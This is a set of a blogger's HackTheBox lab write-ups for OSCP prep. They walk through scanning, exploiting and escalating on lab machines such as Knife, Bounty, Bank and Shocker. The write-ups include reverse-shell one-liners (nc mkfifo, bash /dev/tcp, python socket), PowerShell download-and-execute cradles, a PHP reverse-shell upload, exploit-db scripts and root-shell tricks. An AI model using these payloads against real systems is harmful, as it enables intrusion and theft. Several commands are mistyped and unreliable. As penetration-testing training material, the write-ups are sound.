DEV Community: Chris

Writeup: HackTheBox Knife - Without Metasploit (OSCP Prep)

Chris — Thu, 28 Oct 2021 19:13:21 +0000

Hello all, Apologies for the extreme delay. But I decided to take a mini break to get some more understanding of Priv Esc with Windows and Linux.

This week I decided to hit Knife from Hackthebox.

Let's take it away now!

Command:

nmap -sC -sV -T4 -p- -oN nmap.txt 10.10.10.242

PortOpen:

22 OpenSSH 8.2p1 Ubuntu
80 Apache HttpD 2.4.41

First things first, I am going to head over to the website.

Nothing too interesting here, I clicked around a bit but I was not able to get to any other pages from the landing page.

I am going to run Dirb while I continue to investigate this.

Command:

dirb http://10.10.10.242/ -o Dirb

The index.php brings up the main landing page again and the server-status brings up an error page.

But one thing we know now but didn't before. We can see that we are dealing with a PHP site.

I am going to try another service to see if we can get any useful information. Let's fire up Nikto, which is a free command-line vuln scanner that scans webservers for dangerous files/CGIs, outdated software and other problems.

Command:

nikto -h 10.10.10.242

Scrolling down we can see that the header is PHP/8.1.0-Dev.

Let's also run Curl to investigate the site.

Command:

curl http://10.10.10.242 -v

We can see here that PHP is shown again.

I am going to do some more research on this and head over to Google.

The first entry is for a RCE!

Download this and move it into your file path. Run the pwd command to make sure you are moving it to the right location.

Command:

mv /home/huey/Desktop /home/huey/Documents/HTB/Knife/49933.py

Command:

python3 49933.py

Command:

sudo -l

We can see that NOPASSWD: /usr/bin/knife, which might have an entry in gtfobins.

Let's get a better shell first though.

Command:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f/|/bin/sh -i 2>&1|nc tun0 1234 >/tmp/f

Command:

nc -nvlp 1234
python3 -c 'import pty;pty.spawn("/bin/bash")'

Now head over to Gtfobins and search Knife.

Writeup: HackTheBox Cap - Without Metasploit (OSCP Prep)

Chris — Tue, 05 Oct 2021 09:39:33 +0000

Hello again! I decided to give Cap from Hackthebox a try and providing the below writeup on how to gain access to the box.

Let's go!

Command:

nmap -sC -sV -O -T4 -p- -oN nmap.txt 10.10.10.245

-sV = Probe open ports to determine service/Versions info
-T4 = Set timing for faster output (0-5)
-oN = Output to save it to a file
-p- = Scan all 65535 ports
-O = Operating System Detection
-sC = Default Scripts

Ports Open:

21 FTP vsftpd 3.0.3, vsftpd, is an FTP server for Unix-like systems, including Linux. It is the default FTP server in the Ubuntu, CentOS, Fedora, NimbleX, Slackware and RHEL Linux distributions. It is licensed under the GNU General Public License. It supports IPv6, TLS and FTPS.
22 SSH OpenSSH 8.2p1, OpenSSH is a suite of secure networking utilities based on the Secure Shell protocol, which provides a secure channel over an unsecured network in a client–server architecture.
80 HTTP Gunicorn, The Gunicorn "Green Unicorn" is a Python Web Server Gateway Interface HTTP server. It is a pre-fork worker model, ported from Ruby's Unicorn project. The Gunicorn server is broadly compatible with a number of web frameworks, simply implemented, light on server resources and fairly fast

I am going to run the Nmap Vuln scan while I check out the website.

Now for the results:

There is a CSRF and a DoS vulnerability being shown from Nmap.

Re-checking out the site we notice a few things.

We are logged in via a person named Nathan
The Dashboard has a few different sections such as (PCAP, IP Config and Network Status)

I ran Dirb on the site but it didnt come up with anything interesting the first time around.

The PCAP option looks like a download, and when I select on the option again while scrolling through it changes the URL from 2 to 3.

There might be some other hidden Directories here, so lets try to give Dirb another chance to find something else.

Command:

dirb http://10.10.10.245/data/

Head over to each one of the Directories found and look at the different PCAP captures.

Now after doing this you should see a big difference between the different PCAPs.

If you haven't already, do the following to review them.

Command:

wireshark 0.pcap

Sort by FTP, then scroll down in the page and you should see a password Buck3tH4TF0RM3!

Now save the password to your local machine.

Command:

Cat > password.txt
Buck3tH4TF0RM3!

Now taking the information we found earlier about a user named nathan and combining it with the new password we found lets give it a go. I first tried the FTP but that failed.

I then turned to the SSH port.

Command:

ssh nathan@10.10.10.245

Insert the password from above

Command:

Sudo -l

We see that with our current permissions we are unable to run the Sudo command.

Let's see if we can snag a userflag while we are here.

Command:
**ls
cat user.txt

Well that was easier than I thought!

Following the link we are going to attempt a Priv Esc link.

Pulled text from the site:

"We would start by scanning the file system for files with capabilities using getcap -r / The -r flag tells getcap to search recursively, ‘/‘ to indicate that we want to search the whole system.

The output is usually filled with tens or hundreds of “Operation not supported” errors, making it hard to read. We can redirect errors to /dev/null to get a cleaner output."

This is checking for the sudo permissions and SUID binaries.

Looking over the *Gtfobins site I come across the following that should help out, for more details take a look at this link.

Command:

/usr/bin/python3.8 -c 'import os; os.setuid(0); os.system("/bin/bash")'

whoami && id

Writeup: HackTheBox OpenAdmin - Without Metasploit (OSCP Prep)

Chris — Wed, 22 Sep 2021 16:02:53 +0000

I recently completed the OpenAdmin box from Hackthebox. While this box was rated as being easy it was a little tricky to get my footing and working around the box.

Command:

nmap -sC -sV -O -T4 -p- -oN nmap.txt 10.10.10.171

Ports Open:

22 OpenSSH 7.6p1, Is the main tool for connecting remote login with SSH. SSH encrypts all the traffic as well as providing Securing tunneling plus some other cool things.
80 Apache httpD 2.4.29, This is a free and open-source cross-platform web server. Mostly these servers run on Linux but some of the current/up-to-date ones run on Windows.

Being that I like messing around the website first I will skip over the first port and head directly over to the site.

So nothing too interesting here for me. So lets, fire up some Directory Busting tools.

Command:

dirb http://10.10.10.171/ -o dirb.txt

-o = Will capture this in an output so if you want to clear your screen after it runs you can.

After some time we should get a pretty long list for directories found.

After getting the results we can now head over to the sites that were discovered. It appears to be some landing pages that don't provide too much information for us.

But after we get to the /music location it appears to be a login section which wasn't on the other sites.

Clicking on the login button should bring up a new page called /ona.

Searching on the page brings up the below User Info page. It shows us as being logged in as an guest and that the Database is running on mysqli.

Searching around some and we are able to find the version information.

v18.1.1

When typing ona v18.1.1 into Google, it provides us with the following.

OpenNetAdmin v18.1.1

OpenNetAdmin provides a database managed inventory of your IP network. Each subnet, host, and IP can be tracked via a centralized AJAX enabled web interface that can help reduce tracking errors. A full CLI interface is available as well to use for scripting and bulk work.

Now that we have this key information let's check for any exploits on Kali that we can use for it.

Command:

searchsploit OpenNetAdmin

Let's go with the last one.

Command:

locate php/webapps/47691.sh
cp /usr/share/exploitdb/exploits/php/webapps/47691.sh .

Command:

cat 47691.sh

The code above will push out a pseudo-shell for us.

Before running the code you will need to reformat it.

Command:

dos2unix 47691.sh

Command:

./47691.sh 10.10.10.171/ona/

This will bring up a limited shell on the machine. I decided to use another python script instead, so depending on what you want to do the option is yours.

Command:

wget https://raw.githubusercontent.com/amriunix/ona-rce/master/ona-rce.py

Let's run the code to read the options:

Command:

python3 ona-rce.py

After running the script we get 2 options. One of which is to check if the victim is vulnerable and another one to exploit.

Command:

python3 ona-rce.py check http://10.10.10.171/ona/

Now off to the races.

Command:

python3 ona-rce.py exploit http://10.10.10.171/ona/

So I am the www-data user.

Let's get a better shell on the machine.

Command:

nc -nvlp 1234

Command:

/bin/bash -C 'bash -i >& /dev/tcp/tun0/1234 0>&1'

I am going to check around on the box for any hidden files, while doing this I come across the following 2 users.

After some additional searches on the box I come across the following password for the localhost.

Save these creds to a file.
Now review the file to make sure.

Command:

cat password

Remember that there was a SSH port open before. I am going to try and use the usernames we found with the password we just discovered to login.

Something should have stuck out to you. When I copied that Password to my file I left out the ! by accident. Make sure you are paying close attention to this when you are running on a box.

No try this again with the !.

Let's look at what is running here.

Command:

netstat -a

We can see that a localhost:52846.

While looking at this directory, I see a file called main.php.

I tried to cat it but didn't show much from there so I am going to use Curl with the knowledge that netstat showed there is something running here at the localhost port 52846.

Command:

Curl http://127.0.0.1:52846/main.php

We can see that there is a RSA Private Key here.

Let's copy and paste this into a new file.

Command:

echo > key
nano key
Then paste the code, CTRL+X then Yes to save it.

Verify the contents of file by Cat the file.

I am going to use JohntheRipper to crack this.

But first if you haven't already unziped the txt.gz, do the following.

Command:

cd /usr/share/wordlists
gunzip rockyou.txt.gz
ls To verify that it worked.

Now let's run John!

Command:

sudo john --wordlist=/usr/share/wordlists/rockyou.txt key

So save this password somewhere for the future bloodninjas.

Heading back over to the box, I am going to continue to look through what additional files I can find.

Command:

cat index.php

We see that there is another password here and looks to be hashed with Sha512!.

Grab this and we will run it in the Crackstation to see if it has been cracked.

Now using the id_rsa file which should include your RSA key, lets use this and the newly found password to log into Joanna.

Command:

chmod 600 id_rsa
ssh -i id_rsa joanna@10.10.10.171

input passphrase

Command:

sudo -l

This shows that No password is needed when run from the /bin/nano /opt/priv.

Head over to GTFObins Link
and you see there is a way to spawn a root shell.

Using nano to open the /bin/nano /opt/priv file you will now edit it.

Command:

reset; sh 1>&0 2>&0

Writeup: HackTheBox Bounty - Without Metasploit (OSCP Prep)

Chris — Tue, 14 Sep 2021 23:29:18 +0000

Hello All,

Just did Bounty from Hackthebox and would like to share my walk-through of the box.

Let's Start!

Command:

nmap -sC -sV -O -oN nmap.txt -p- -T4 10.10.10.93

-sC = Default Scripts
-sV = Probe open ports to determine service/Versions info
-T4 = Set timing for faster output (0-5)
-oN = Output to save it to a file
-p- = Scan all 65535 ports
-O = Operating System Detection

Ports Open:

80 HTTP Microsoft IIS httpD 7.5

Let's run a vuln scan really quick to see if anything comes up.

Command:

nmap --script vuln -oN vuln.txt 10.10.10.93

Nothing too interesting here for us, so let's move on.

Heading over to the site, we are greeted with a Merlin landing page.

If we right-click the site we see that there isn't much information here to gather.

I am going to run dirb now to see if we can bust some directories.

Command:

Gobuster dir -u http://10.10.10.93 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x aspx, html, txt, conf, php

-x = This will find the file extension that might be on the site.

Focusing on the 2 files that I highlighted we can see that there is a UploadedFiles and Transfer.aspx location on the site.

Heading back over to the site we can see there is a upload option on the site.

After playing around with the upload's button I figure out that I am able to upload a config file to the site. Some further reading and I come across the following article that should allow me to get an RCE on the site.

link

Scrolling down to the bottom of the page we can see that the script is adding 2+1 and should equal 3 once uploaded on the site. Give it a go and see if you are able to get it running.

Command:

cat > web.config
nano web.config

Now copy + paste the code into the newly created file.

Now after uploading the file head over to uploadfiles/web.config!

We are now going to create a Reverse shell that should allow us to get a interactive shell on the machine.

Command:

echo > shell2.ps1

I am going to copy/paste the following nishang Reverse Shell in the newly created file link.

Now at the bottom of the shell2.ps1 script past the following:

Command:

Invoke-PowerShellTCP -Reverse -IPAddress tun0 -Port 4444

Now within the web.config edit the code to add the following:

Command:

Set obj = CreateObject("WScript.Shell")
obj.Exec("cmd /c powershell IEX(New-Object Net.Webclient).DownloadString('http://tun0:80/shell2.ps1')")

Command:

python -m SimpleHTTPServer 80

This will serve over the file.

Now lets start our Netcat listener.

Command:

nc -nvlp 4444

Now upload the file to the site like you did before.

Command:

whoami

Command:

systeminfo

So it look's like we need to do a Priv Esc on the machine. After some digging I see that SeImpersonatePrivilege is enabled.

I am going to grab JuciyPotato and run it to see if we can do a priv esc. This blog link provides a wealth of information on the tool.

Command:

wget https://github.com/ohpe/juciy-potato/release/download/v0.1/JuicyPotato.exe

We will need to create a bat file that calls to our Powershell script once again. This time we will change the Port number its calling out to.

Command:

powershell -c IEX(New-Object Net.Webclient).Downloadstring('http://tun0/Invoke-PowerShellTCP.ps1')

Now update the Invoke-PowerShellTCP.ps1 script to switch the port number to 5555.

Now on the box let's move the script over.

Command:

(new-object net.webclient).downloadfile('http://tun0/JuicyPotato.exe', 'C:\users\merlin\appdata\local\temp\JuicyPotato.exe')

(new-object net.webclient).downloadfile('http://tun0/shell.bat', 'C:\users\merlin\appdata\local\temp\shell.bat')

Command:

To confirm that this is sitting on the box.

Also your Python WebServer should display the files moved.

Let's fire up the netcat listner again.

Command:

nc -nvlp 5555

Now for the final steps let's run JuicyPotato to see if we can upgrade our rights.

Now head back over to the listener.

Boom looks like we are in!

Let's grab the User/Root txt files.

Writeup: HackTheBox Valentine - Without Metasploit (OSCP Prep)

Chris — Mon, 23 Aug 2021 15:50:58 +0000

Hello Again!

Just did Valentine from HackTheBox and wanted to provide a write up.

Let's Begin!

Command:

nmap -sC -sV -p- -T4 -p- -oN nmap.txt 10.10.10.79

-sC = Default Scripts
-sV = Probe open ports to determine service/Versions info
-T4 = Set timing for faster output (0-5)
-oN = Output to save it to a file
-p- = Scan all 65535 ports

Ports Open:

22 TCP SSH OpenSSH 5.9p1

Not a ton of things to go off here so let's re-run the nmap tool with a more aggressive scan.

Command:

nmap -A -oN Aggressive.txt 10.10.10.79

Ports Open:

80 TCP Http Apache HttpD 2.2.22
443 TCP SSL/Http Appache 2.2.22

Heading over to the site we get a interesting landing page.

Now we are going to run some Directory search's.

Command:

dirb https://10.10.10.79 -o dirb.txt

Results:

The one that sticks out is the /dev/ site.

This turns up 2 different files. One is a hype_key and notes.txt.

Going to the notes.txt.

In here, there is a refence to fixing the decoder/encoder before going live.

On the other Directories there is a Encoder and Decoder but I didn't see anything too interesting.

We can see the Hex file when going to the hype_key location.

Instead of trying to use the Encoder and Decoder I am going to head over to Google to find a tool that will do the trick.

Then drop the Hex into the input.

This looks like its a RSA Private Key.

Now let's save the key to your Kali Machine.

Command:

echo "RSA Key Info..." > rsa.key

I tried using the newly acquired creds to login via the SSH option.

The -i option Selects a file from which the identity (private key) for public key authentication is read.

Command:

ssh -i rsa.key hype@10.10.10.79

I am making a guess that the user is hype based on the key information.

This doesn't work though.

I am going to try and run the Vuln scan to see if I missed anything.

Command:

nmap --script vuln -oN vuln.txt 10.10.10.79

Scrolling down we see that there is a vulnerability for HeartBleed.

A quick Summary on HeartBleed if you are not familiar.

Heartbleed was a security bug in the OpenSSL cryptography library, which is a widely used implementation of the Transport Layer Security (TLS) protocol. It was introduced into the software in 2012 and publicly disclosed in April 2014. Heartbleed could be exploited regardless of whether the vulnerable OpenSSL instance is running as a TLS server or client. It resulted from improper input validation (due to a missing bounds check) in the implementation of the TLS heartbeat extension. Thus, the bug's name derived from heartbeat. The vulnerability was classified as a buffer over-read, a situation where more data can be read than should be allowed. Pulled from Wiki.

Command:

Searchsploit 32764.py

Now Copy this to your current directory.

Now lets run the Exploit!

Command:

python 32764.py 10.10.10.79 > heartbleed.txt

You don't have to send this to a file but its a lot to look through if you don't.

So what I am about to do is very choppy but it worked for me. Yes there are other ways to display the output but at this point I was getting annoyed with the box lol.

Command:

grep 'text' heartbleed.txt

Now scroll up to the 0130 line in the wall of text.

Let's break this with base64.

Command:

echo aGVh....= | base64 -d

Command:

chmod 600 rsa.key

ssh -i rsa.key hype@10.10.10.79

Don't forget to use the heartbleedbelievethehype password.

So I tried running the my normal Sudo commands and it broke my shell. So let's dig around a bit.

Going back to the Hype directory I notice that tmux is being run by root.

Command:

ps aux | grep tmux

Command:

tmux -S /.devs/dev_sess

Writeup: HackTheBox Sense - Without Metasploit (OSCP Prep)

Chris — Tue, 17 Aug 2021 18:59:20 +0000

Hello there!

I just finished doing Sense from Hackthebox and sharing my writeup.

First thing is first, lets start with Nmap!

Command:

nmap -sC -sV -T4 -oN nmap.txt 10.10.10.60

-sC = Default Scripts
-sV = Probe open ports to determine service/Versions info
-T4 = Set timing for faster output (0-5)
-oN = Output to save it to a file

Ports Open
80 TCP HTTP lighttp 1.4.35, is an open-source web server optimized for speed-critical environments while remaining standards-compliant secure and flexible.
443 TCP SSL/HTTPs?

Command:

nmap --script vuln -oN vuln.txt 10.10.10.60

After running this command I get a few options for Vulnerabilities. But a MITM and/or Information Disclosure is of little use to us here.

Let's head over to the site.

Now select Accept.

This will bring up a login page.
I tried a few different default options but it didn't allow me to gain access to the site.

Now I am going to try and run Gobuster..

Command:

gobuster dir -u https://10.10.10.60 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -e -x txt -k > gobuster

This will take some time, but after some time you should get the following response back from the search.

I am going to check out the .txt files first.

So let's head over to Google to see if we can find any default creds.

After some searching I come across the following.

admin:pfsense

And the username we found above is Rohit.

Afternoon some playing around I noticed that if you switched the case's you will be able to get in.

After we get in we are able to get some additional information on the underlying services.

Version:

2.1.3-Release(amd64) FreeBSD 8-3-Release
root@pf2_1_1_amd64.pfsense.org

With the information that we were able to get from the login window we are able to use this to head over to Google for some more enumerating.

After some searching I come across the following site.

This looks very promising! This is a Command Injection Vulnerability.

When scrolling down into the code base it looks like you only need a few items to get the ball rolling on this one.

Options:

rhost
lhost
lport
username
password

Something I like to do is to check if its already on Kali. Why download something if the exploit is already here?

Command:

searchsploit pfsense

Now look for that tag number 43560.

Command:

locate php/webapps/43560.py
cp /usr/share/exploitdb/exploits/php/webapps/43560.py .

Command:

chmod +x 43560.py

Now let's run this bad boy!

Command:

python3 43560.py --rhost 10.10.10.60 --lhost 10.10.14.7 --lport 1234 --username rohit --password pfsense

Command:

nc -nvlp 1234

Command:

whoami

Now let's get the Flags!

Writeup: HackTheBox Blocky - Without Metasploit (OSCP Prep)

Chris — Fri, 13 Aug 2021 15:55:58 +0000

Hello All!

Did another walk-through and this time its Blocky from HackTheBox.

So let's kick this off.

Command:

nmap -sC -sV -T4 -oN nmap.txt 10.10.10.37

-sC = Default Scripts
-sV = Probe open ports to determine service/Versions info
-T4 = Set timing for faster output (0-5)
-oN = Output to save it to a file

Current Ports Open:

21 FTP ProFTP 1.3.5a
22 SSH OpenSSH 7.2p2
80 HTTP Appache HttpD 2.4.18
8192 Closed

Now let's try to run Dirb on the system.

Command:

dirb http://10.10.10.37

After a few moments we should get a response from the busting.

There is a lot of information here so let's take 1 step at a time. Going to the first Directory found brings up a Landing Page that if you scroll down to the bottom has a Comment section. Granted there is no option for uploading files to this section but you can run html code that will display.

Command:

test

So this isn't the most interesting thing but if you scroll down you will see a Login button.

I am going to try some quick common passwords on the site:
admin:admin; admin:password; admin:password1234; root:toor; root:root

None of these seems to work so I went over to Google to see if there are any default creds I could use.

But scrolling down the Dirb list the /phpmyadmin/ brings up a new potential avenue for access.

I attempted some common username:password combinations like above but no juice. Going back down the list from Dirb, I came across 2 different files under the /plugins/ location.

Let's go ahead and download these files to our Kali machine.

Command:

mv BlockyCore.jar /home/huey/Documents/HTB/Blocky
mv griefprevention-1.11.2-3.1.1.298.jar /home/huey/Documents/HTB/Blocky

Then head to google and search for Java Decompilers.

Command:

Select Browse then upload your file

Command:

Select Com

Command:

Select myfirstplugin

Now we can read the file. We can see that there is a Root user than a sqlPass of 8YsqfCTnvxAUeduzjNSXe22. Copy that into a new file on your Kali machine for future use.

Another way to do this is the following:

I am going to see if I can use these creds to login.

Success! After some more digging around I see another user named Notch and another User_Pass.

So I messed around here for quite a bit before getting in. But I decided to see if I could use those creds above to login via the SSH server.

Command:

ssh notch@10.10.10.37
8YsqfCTnvxAUeduzjNSXe22

Success! I was able to login and get access!

Now let's run the following to see what we can do.

Command:

sudo -l
welp this is pretty easy
sudo su

Writeup: HackTheBox Bank- Without Metasploit (OSCP Prep)

Chris — Tue, 10 Aug 2021 17:14:23 +0000

Hello all,

Some quick updates, I decided to schedule my OSCP for early October to give me enough time to run through some more box's then move over to Proving Ground on OffSec's platform.

Now let's jump right in!!

Command:

nmap -sC -sV -T4 -oN nmap.txt 10.10.10.29

-sC = Default Scripts
-sV = Probe open ports to determine service/Versions info
-T4 = Set timing for faster output (0-5)
-oN = Output to save it to a file

Ports Open:

22 SSH OpenSSH 6.6.1p1
53 ISC Bind 9.0.5-3ubuntu0
80 HTTP Apache HTTPD 2.4.7

Let's run a quick Vulnerability Scan to see what we can find.

Command:

nmap --script vuln -T4 -oN vuln.txt 10.10.10.29

So I see a DoS here but that doesn't really help us because we want to get an RCE on the box :-).

I am going to head over to the site to see what I find there...

Some thing I did while on the site was to check out the source and some of the directories listed but nothing too special stuck out for me.

I am going to run a Dirb to see if there are any hidden directories here.

So both of these sites bring up a Forbidden screen.

Let's now try using Gobuster.

Command:

gobuster dir -e -u http://10.10.10.29 -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt

Being that port 53 is open I am going to checkout the DNS record.

Command:

nslookup
127.0.0.1
10.10.10.29
bank.htb

If you noticed when doing a look at the IP it can't locate but when looking at bank.htb it comes up with the addresses.

Command:

dig axfr @10.10.10.29
As we can see not too many hits...

dig axfr bank.htb @10.10.10.29

I am going to edit the /etc/hosts/ and the /etc/resolv.conf

Command:

10.10.10.29 bank.htb

Command:

nano /etc/resolv.conf
nameserver 10.10.10.29

Let's try and re-run GoBuster!

Command:

gobuster dir -e -u http://10.10.10.29 -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt

After making those quick addition's we get a lot more hits. So let's go check them out.

Clicking on the Parent Directory brings up a login screen for an Email and Password. I tried some dummy emails and common enumeration but it didn't work.

Now I am going to checkout the Balance-Transfer directory, to see if there is anything interesting there.

Each of these look like specific accounts for users with their hashed Email/Passwords with their account balances. If you go down the line, each of the links provides a different account.

One thing we will do is sort by size to see if there is any differences.

After doing so we see there is a 257 size .acc file here. Open it and let's take a look.

Here we can see there is un-hashed account information such as:

Email = chris@bank.htb
Password = !##HTBB4nkP4ssw0rd!##

Now head back over to the login screen again and put in the creds we just found.

Click the Support link and it will bring up a way for the current user to submit Files.

On my Kali machine I create a test file to see if I can upload a file.

Command:

touch test.php

Now on your console try and upload it.

Change it from a php file to a jpg file.

So I did some quick GoogleFu and I didn't see any JPG reverse-shells. But when I inspected the page I came across this line of text.

So lets grab a php-reverse-shell then we can update the code to hopefully get a shell.

Command:

wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php

nano php-reverse-shell.php
Change the IP to your tun0 and the Port IP
chmod +x php-reverse-shell.php

Now we are going to change the php file to a htb file.

Command:

mv php-reverse-shell.php shell.htb

Now let's re-upload this back to the site.

Command:

nc -nvlp 1234

Give it a few seconds then you should get access!

Now let's upgrade the shell using the following scripts Link.

Command:

python -c 'import pty; pty.spawn("/bin/bash")'

Command:

whoami

Priv Esc

Command:

Find / -perm -4000 2>/dev/null

It appears that the Emergency file should be able to run with the appropriate permissions.

Command:

cd /var/htb/bin
ls
./emergency
whoami

Now locate the Root/User .txt files.

Writeup: HackTheBox Nibbles - Without Metasploit (OSCP Prep)

Chris — Wed, 14 Jul 2021 17:28:53 +0000

Hello All,

I did Nibbles from HacktheBox and providing my write-up!

Let's get going!

First we will start with nmap.

Command:

nmap -sC -sV -T4 -oN nmap.txt -vvv 10.10.10.75

-sC = Default Scripts
-sV = Probe open ports to determine service/Versions info
-T4 = Set timing for faster output (0-5)
-oN = Output to save it to a file
-vvv = 9 different levels and will cause Nping to print more information during execution more reading link

After a few moments we get the following result.

OpenPorts:

22 TCP OpenSSH 7.2p2
80 TCP HTTP Apache HttpD

So let's head over to the site.

Nothing too crazy here so lets right-click and open up the site.

If you look at the bottom of the page it appears that there is a hidden directory there /nibbleblog!

I am going to run Dirb on the original IP that was given to see what is discovered. A hint, it actually doesn't discover that hidden directory that we discovered from our OSINT research.

Command:

Dirb http://10.10.10.75/

Now let's re-run this from that directory that we found earlier.

Command:

dirb http://10.10.10.75/nibbleblog/

So much more items came up from this search than earlier. Sometimes when you have a good thread to pull on you can get a lot more information than going at it blindly.

One item sticks out more than anything else which is the /nibbleblog/admin/ location.

A whole lot of clicking around later and nothing to show for it so I moved on to some of the other directory's that were discovered from the list.

The /admin.php stood out as something that could be interesting.

Going to try and run Hydra on the login window.

Command:

hydra -l admin -P /location of your file -vV -f -t 2 10.10.10.75 http-post-form "/nibbleblog/admin.php:username=^USER^&password=^PASS^:login_error"

Tried this to get access to the login but it didn't work.

So I tried admin:nibbles and it actually worked!

Looking around on the page we can see the version number of what we are dealing with.

I am going to check out Searchsploit to see if there are any exploits we could use on this site.

So I don't think a SQL Injection would be of use to us and I don't want to use Metasploit.

So I am going to google around for the version that we discovered earlier.

I am came across the following packetstorm entry.

LINK

When uploading image files via the "My image" plugin, the extension or the actual file type are not checked, thus it is possible to upload PHP files and gain code execution.

From earlier enumeration we know that PHP is running here so lets go over to pentestmonkey to grab a script.

Command:

Git clone https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php

Open up the file either using VIM or NANO and take a look/change the following section to your tun0 and port.

Let's make sure its executable.

Command:

chmod +x php-reverse-shell.php

Now if you remember from the PoC that we read above this needs to be uploaded in a certain section.

Head over to the Plugins> My Image and click Configure.

Go to the Browse option and locate the file.

Now after this is uploaded you should get a bunch of error messages, disregard them for now and head over to another window on Kali to setup your Netcat.

Command:

nc -nvlp 1234

Now from the PoC it says to go to the content/private/plugins/my_image then click image_php.

From here we will head back over to our Netcat listener to see if we got a shell.

Boom we are in! Lets upgrade our shell.

Command:

which python
which python3
python3 -c 'import pty;pty.spawn("/bin/bash")'

Command:

wc user.txt

Alright lets see if I can priv esc to root.

Command:

sudo -l

So we can run root with no password from the /home/nibbler/personal/stuff/monitor.sh location

After some additional searching on the box there doesn't appear to be a file location like the one listed from Sudo -l, so lets make one!

Command:

mkdir personal
cd personal
mkdir stuff
cd stuff

As we did in the previous boxes we are going to try and use bin/bash.

Command:

echo "/bin/bash -i" >> monitor.sh
cat monitor.sh
sudo ./monitor.sh
whoami
wc root.txt

Great work!

Writeup: HackTheBox Shocker- Without Metasploit (OSCP Prep)

Chris — Thu, 08 Jul 2021 19:52:28 +0000

Hello All,

Thing's have gotten a little serious as I have bought my OSCP Certification attempt. So I will hopefully pushing out more HTB write-ups over the next 2 weeks.

Let's begin!!

Command:

Nmap -sC -sV -T4 -oN nmap.txt -vvv 10.10.10.56

-sC = Default Scripts
-sV = Probe open ports to determine service/Versions info
-T4 = Set timing for faster output (0-5)
-oN = Output to save it to a file
-vvv = 9 different levels and will cause Nping to print more information during execution more reading link

Port Opens:

80 TCP HTTP
2222 TCP SSH

Let's run a full port scan to see if we missed anything here.

Command:

nmap -p- -oN allports.txt 10.10.10.56

So nothing else actually returns which is a bummer.

Let's try and run a quick Vuln scan just for kicks.

Command:

nmap --script vuln -oN vuln.txt 10.10.10.56

Nothing here pops out to me so lets move on to the site so lets check out the source.

Command:

Right-click

I hit some snags with Dirb so I am going to use Dirbuster.

From a non-root windows do the following.

Command:

dirbuster
This should take a min then open up a new terminal.

Key items to pay attention to:
Target URL
File with list of dirs/files
File Extension

Looks like we found a file user.sh on the machine that we might be able to access.

You can right click it or manual go to it in the webpage.

So after looking into /cgi-bin/ and the name of the box it appears it could be hit with ShellShock.

Command:

nmap -sV -p80 --script http-shellshock --script-args uri=/cgi-bin/user.sh,cmd=ls 10.10.10.56

How did I know to use this? Nmap link

Now that we know we have a way in lets go over to Searchsploit.

Command:

searchsploit shellshock

I am going with this one because its a RCE Injection that is also a python script. The other ones listed are Txt files which are a little funky to me.

Use the CP command to copy the exploit to your file location or locate it in the Exploit-DB repo and download it.

Okay so lets look at the exploit code.

Command:

nano exploit.py

If you scroll down you get some options on how to run the exploit without having to alter it.

To confirm you can run the code test it.

Command:

python exploit.py

Command:

python exploit.py payload=revese rhost=10.10.10.56 lhost=tun0 lport=8080 pages=/cgi-bin/user.sh

Command:

Nice!

Here we will see what we can do with Sudo.

Command:

Sudo -l

It appears we can Root with no password from the /usr/bin/perl location.

Heading over to google to confirm my thinking.

Also the HackingArticles provides a really great resource for comands link

Command:

sudo perl -e 'exec "/bin/bash";'
id
whoami

Command:

wc root.txt

Another way to do this for a more stable shell!

After the initial access on the machine.

Command:

which python3

From here head over to Payload all the Things Github link

Command:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",4242));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'

Update the IP address to your tun0 address.

Command:

Use the command above!

Before hitting enter, open up Netcat on another window.

Command:

nc -nvlp 1234

We can now run the same priv esc as before. This time we will be on a more stable instance!

Way to go you got it!!

Writeup: HackTheBox Mirai- Without Metasploit (OSCP Prep)

Chris — Mon, 05 Jul 2021 14:17:16 +0000

Hello Again All!

Here with another write up and this time it will be Mirai from HackTheBox.

Difficulty level: Easy

So lets begin!

Command:

Nmap -sC -sV -T4 -oN nmap.txt 10.10.10.48

-sC = equivalent to --script=default
-sV = Probe open ports to determine service/Versions info
-T4 = Set timing for faster output (0-5)
-oN = Output to save it to a file

Open Ports displayed:

22 OpenSSH
53 DNSmasq
80 Lighthttpd
1185 Platinum

Let's head over to the website to see what is there.

Nothing appears to display when going to the site so let's try the following.

Command:

Right-click on the page.

Still nothing is displaying.

Alright, lets check out the other ports open on the box.

Command:

ssh 10.10.10.48

So no luck with trying to just SSH into the machine. I am going to run a nmap Vuln Scan on the machine to check.

Command:

Nmap --script vuln -oN vuln.txt 10.10.10.48

If you scroll down to the middle of the page there is a reference to something called "Pi-Hole".

I am going to try something else to see if anything comes up.

Command:

curl -vvv 10.10.10.48

Simply curl or command-line tool and library for transferring data with URLs.

So we can now see again there is something with "Pi-Hole" going on here.

Directory Busting is usually helpful when trying to find hidden directories on a site.

Command:

dirb http://10.10.10.48

After a few minuets of this running we come back with a success with /admin/.

Great, lets now head over to the site to see if there is anything there.

So if you never heard of Pi-Hole or Pihole this is a linux network-level advertisement and internet tracker blocking application which acts as a DNS Sinkhole and/or DHCP Server.

After playing around withthe site for a few minuets I head over to the Login landing page.

So I tried doing a few things here, attempted to use Hydra to gain access on the site as well as use hydra for the SSH login but no luck. From here I head over to Google.

So it looks like the Username/Password gets set to pi:raspberry.

I tried using this on the login page but that didn't work so I turned to the SSH login.

Command:

ssh pi@10.10.10.48
raspberry

Looks like we got our first access to the SSH server!

Command:

wc user.txt

Lets run some Sudo commands.

sudo -l will list the allowed and forbidden commands for the invoking user on the current host.

Command:

sudo -l

Welp that is interesting....

Alright I am going to try and switch users.

Command:

sudo su-
whoami

Command:

ls
cat root.txt

Looks like someone removed the root.txt from this file and its in a USB stick....

Take the time and go into the files and see if there is anything that pops-out at you.

Command:

ls -la

After some searching I come across the /media location with a usbstick there.

Command:

cd media
ls
cd usbstick
cat damnit.txt

It appears that someone else deleted your files off the usb stick.

Commnd:

